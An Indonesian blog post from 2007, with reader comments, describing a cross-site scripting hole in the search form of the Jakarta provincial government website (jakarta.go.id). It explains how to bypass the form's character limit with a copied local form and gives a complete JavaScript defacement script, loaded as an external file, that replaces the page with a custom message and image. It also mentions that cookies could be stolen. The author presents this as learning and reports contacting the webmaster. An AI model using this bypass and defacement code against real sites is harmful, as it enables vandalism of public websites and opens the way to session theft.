Situs jakarta.go.id ada bug XSS
Friday, June 29th, 2007 8:35 pm
Lagi browsing caari cari artikel tentang pemerintah. Eh ketemu Situs Resmi Pemerintah Propinsi DKI Jakarta trus langsung di redirect ke alamat: http://jakarta.go.id/v21/home/default.asp?lg=1
Nah, lagi asik browsing, coba search engine di situs itu. Bingung kok kata yang dicari dibatesin cuma bisa sampe 17 karakter. Agak aneh memang, biasanya mesin pencari gak membatasi kita mo cari berapa karakter.
Trus iseng-iseng masukin kata seperti ini:
[code lang="html4strict"]
tes
[/code]
Nah, yang terjadi:
Loh, kok gitu?? knapa tag HTML bisa masuk?? 
iseng-iseng, coba ah masukin script JavaScript, siapa tau situs ini rentan XSS
Nah, permasalahannya, karena cuma dibatesin 17 karakter, jadi mesin cari di web ini gak mungkin ditulisin script spt:
[code lang="javascript"][/code]
yang notabene lebih dari 17 karakter.
Karena saya (ngakunya) webmaster, masa seeh gak tau logikanya bikin web, jadi tinggal buat aja tampilan dengan mencontek situs ini. Maka seperti biasa saya View Source (( Cuma buat pengguna Mozilla Firefox. Klo gak kebuka, bisa CTR+U, atau pilih View Source ))
Ok, terus buat file HTML yang mirip dengan mesin cari di situs tsb, terus kita ilangin perintah maxlength=”17″, terus karena saya suka XHTML jadi kode yg gak ditutup jadi saya tutup 
+ tambahin nama domain di bagian action:
[code lang="html4strict"]
action="http://jakarta.go.id/v21/cari/default.asp?act=list&lg=1">
[/code]
terus beri nama terserah. Klo saya beri nama dengan jakarta.html
Nah tampilannya jadi kayak ini:
Nah, terus coba masukin script JavaScript spt ini di dalem form input yang sudah dibuat:
[code lang="javascript"][/code]
Dan yang terjadi??? 
:”> Bisa tembus XSS
Nah, klo gitu kita coba yang agak aneh-aneh ya, masa seeh udah tau ada bug XSS malah dibiarin gitu aja. Kita coba ‘agak-agak nakal‘ ya. Coba buat script JavaScript dengan kode seperti berikut:
[code lang="javascript"]
var title = "Tes tes XSS";
var bgcolor = "#000000";
var image_url = "http://farm3.static.flickr.com/2400/1850740005_0120d0218e.jpg";
var text = "Hasil Deface Ini Semata-mata Hanya Untuk Belajar! Bagi Webmaster, mohon benahi segera. Terima Kasih";
var font_color = "#FF0000";deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Tahoma';
txt.style.color = fontColor;
txt.innerHTML = pageText;
overLay.appendChild(txt);if (image_url != "") {
var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg);
}var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Tahoma';
footer.style.color = '#DDDDDD';
footer.innerHTML = title;
overLay.appendChild(footer);
}
[/code]
Terus, simpan dengan ekstensi .js (untuk nama terserah, tetapi ak pake nama xss.js)
Terus tinggal masukin alamat script tadi ke dalam form input yang telah dibuat tadi. Dengan script seperti ini:
[code lang="javascript"][/code]
Nah jadilah tampilan seperti ini:
Untuk kamu yang mo coba, ak sudah upload file untuk mencoba:
Parahnya, situs ini juga gak bisa ngenalin metode $_POST dan $_GET pada metode REQUEST, jadi bisa diinject dengan membuat alamat URI seperti ini:
Untuk semuanya, saya bukan bermaksud sombong, sok menjadi hacker, dan sebagainya. Saya cuma ingin Anda tau untuk kemajuan kita bersama. Untuk webmaster jakarta.go.id semoga bisa dapat cepat menutup bug ini. Berbahaya jika orang lain malah mengambil isi cookies yg ada di web tsb dengan XSS. Buat temen-temen yg blogger, klo ada yg kenal sama webmasternya coba hubungi ![:)]](http://ardy.or.id/smilies/yahoo_onphone.gif ":)]"){kind=small}
dia. Terima Kasih
X Sangat Sederhana?
mainnya ga seru dong xixixi
wah, bisa gituan juga toh mas rD =P~ ajarin aLe donk [-o< FS aLe br d hack orang tuh :(
ngomong2 cewek sapa tuh =P~ cakep amit :D
weitss….![:-\](http://ardy.or.id/smilies/yahoo_question.gif ":-\")
”
mantab2, btw situs mana lagi yang udah di “isengin” selain jakarta.go.id
udah ngasih tau ke dikiweb@jakarta.go.id blum, nih imel ada di bawah situs nya.
loh sampeyan sudah ngomong ke webmastere ?
kalau belum , kenapa di post disini?
nanya dulu deh , demi keamanan situs kota Jkt sampeyan :P
hihihihi
Maklum namanya juga web plat kuning :D
wuih… kagak tau aku bahasa beginian. email ke contact personnya aja kalo ada.
#pertamax
iya, ini sederhana bgt, cuma memanfaatkan bug
#2
duh, klo prenster saya jarang login
#3
sudah dihubungin tuh, blom dapet jawaban
#4
plat kuning?? he he he…
#5
wah, saya bukan orang yg suka cari2 kesalahan gitu mas, cuma kebetulan aja neeh :-" . Iya udah di hubungi
#6
iya sudah dihubungi
Ngomong=ngomong commentnya ada bugnya juga lho. Masak saya dari Indonesia dan Agam yang saya tahu juga dari Indonesia bisa sama-sama dari Australia sih??
heuu. payah nih webmasternya >,
Hanya bisa di buka di tempat kita, hehehehe, ga seru ah
Waduhhhh…gak ngerti
XSS itu bahasa apa yah? Kok baru tahu sekarang ini neh.
#2
nyambung: cewek cakep itu namanya Asuka Hinoi, ratu para-para dance jepang. Cari di gugel aja. ~:>
#8
ya, namanya juga <abbr title="Cross Side Scripting">XSS</abbr> Raf @-)
#12
He… gak tau juga, mungkin Mas dan Agam pake proxy Ausie, itu cuma menurut database berdasarkan nomer <abbr title="Intenet Protocol">IP</abbr>. Atau emang di database saya yg salah?? #-o
xss masih satu keluarga ama css
Hmmm coba kamu bisa kasi tau si empunya situs, kayaknya akan membantu banyak tuh…
wah wah..kok bisa ya?… tapi kayaknya situs2 pemerintah daerah itu rada2 rentan deh..
ya gak tau juga sih
wahhh.. ini mah bukan mainanku… kalo baca gini bisa pusing ntar malem… :o
haduh… *langsung mules, banyak coding..*
sayah minta bikinin ajah yah..
ga ngerti. xss itu tetangganya xxx kah? :P
bro ajarin dong gimana caranya nutup celah yang gituan, jadi kalo ntar aku buat web bisa di minimalis bug nya
blogmu kok jd berat yo? aku ngescroll ke bawah.. ke atas.. jd berat.
hidup penuh dengan bug
wah…….
biasanya yg bikinan pemerintah emang ga beres gitu
btw, bekgronnya ganggu bgt nih
kalo bisa warnanya dibikin aga pudar gitu kayanya lebih asik
ga terlalu mencolok
*cuma usul*
Waah… ketemu hacker handal nih.
ga ngerti. saya gaptek total!! :((
bug serupa juga terdapat di situs pengumuman USM ITB 2007.. :d/:x:d:d
@finkz
iya, aku juga ngerasain hal yang sama
seperti kata pepatah gak gading yang tak retak
wew, sebegitu 'jail'nya dirimu
hehehe :D
makasi deh itung2 nyari kongsengan blajar :-"
keren blognya.. ah ga ngerti saya.. yang penting komentar….
:-? mantab…
mau ga jadi guru gw :D
XSS ??? masih saudara-kah sama XML ??? :d
[Salam kenal ya ?]
#15
jauh malah
beda lah..
#16
sampe sekarang email saya blom dibales sama yg ngurus web jakarta.go.id
#17
pusingnya jgn ntar mlm, sekarang aj
#18
gak begitu bnyk kok, kopi-pes aj dr tulisan ak
#19
iya, tetanggaan, sebelah xss tuh ada xxs nah disebelahnya baru xxx
#20
seeep, apa yg gak ak ajarin ke kamu Ri…
#21
he… iya, kmaren web yg harganya 1,9M kena hack jg tuh. Cb baca di:
http://ardy.or.id/2006/07/21/situs-mentawai.xhtml
http://ardy.or.id/2006/07/22/cek-cek-situs-mentawai-lagi.xhtml
#22, #26
masa seeh?? emang agak berat seeh, cm gak berat2 amat…
#23
HIIIIDDUUUUPPPP bug… (loh kok ??)
#24
untuk itu, jadiin ini media utk blajar
#25
makasih atas infonya kang Aziz
#27
udah dipudarin, tp klo mmg ganggu, ntar dipudarin lg deh. Klo bener2 gak kliatan, duh bisa kena ‘penggal’ ak sm ce yg nampang di bekgron
#28
weeee. saya bukan hacker mas… saya webmaster
#29
sama-sama blajar mas…
#30
sama, saya jg kurang mengerti (loohh???) yg penting posting… he he he
#31
mestinya saya yg berguru sama bang Elzan
#32
iya, sodara jaaaaaaaaaauuuuuuuuuuuuuuuuuuuuuuhhhhhhhhhhhh bgt
#33
sampe sekarang blom dpt kbar dr webmasternya
dy blog mu di tempatku kok kebukanya berat banget yah plus lama apa net ku yah yang error
makanya baru bisa mampir niii 
Ternyata beratribut jakarta tidak menjamin bisa canggih. Informasi bagus bwat webmasternya, sip! :)
itu kayaknya udah jadi hal wajib yg harus diketahui si pembuat webnya.. /:)
smoga segera diperbaiki deh
Hai om, numpang ngejunk dsini
wah, dah pke wp 2.2.1 yah? ckckck…
om, Kai mo nanya, bikin tulisan jd ngeblur pke css itu gmn? (kyk yg di tagcloud yg plg kecil itu loh)
mohon dijawab & thanx b4 (lewat e-mail jg gpp
dasar rd usil…
dah lama tuh aku gak main2 XSS sekarang hobinya inject-inject… biar gak sakit inject terus…
btw blog baru aku dah jadi tuh mampir yah…
asik tuh bisa di maenin iseng sih waktu itu sama rd nyoba2 nyari bug eh dapet
wah gak nyangka rame juga yang kasih komen di postingan ini
#35
layout komentar diganti neeh. Kmaren pake <table> kebanyakan. tes dulu, msh berat gak…
#36
iya, udah dikasih tau. Cuma yg punya gak nge-respon2 imel ak
#37
langsung di kunjungi. Wah… situs underground neeh… btw kok korbannya tempat kuliah ak seeh??
nb: udah di add juga ke Gugel Reader ak
#38
iya. Upgrade bro, karena ada bug nya, liat aj di posting patrush:
http://patrush.web.id/2007/05/25/hati-hati-yang-p…
lagi nulis imel neeh ke kamu
#39
Iya, browsing bareng elo ya Cok
#40
Iya neeh. Gak nyangka bakal rame :P
test gravatar
ha………………………………haaaaaaaaaaaaaaaaaaaaaaaaa…………..!
akhirnya sobat gwa………………………………………….punya beginian juga……………!
tapi hati2 aja lo……ntar gwa hack/////////////////……………….!
tapi cren juga dechj………………………!
sukses deh buat lo.
go freedom
wah…codingnya banyak2 bgitu..aku tak mengerti…
Btw, salam kenal mas Ardy.. nice blog euy..background templatenya jg lucu..kreatiph.. ^^v
cuma ngetes browsing pake safari…
ngebut bow…
Waduh, artikelnya susah dimengerti, maklum gaptek nich
Tapi keren blognya! Great job man.
wuih…kagak ngerti ahk yg kyk gini2. yang pelajaran melukis ada gak ya??
wehh…
wehh….
wah mana neeh update barunya, lagi nungguin apa neeh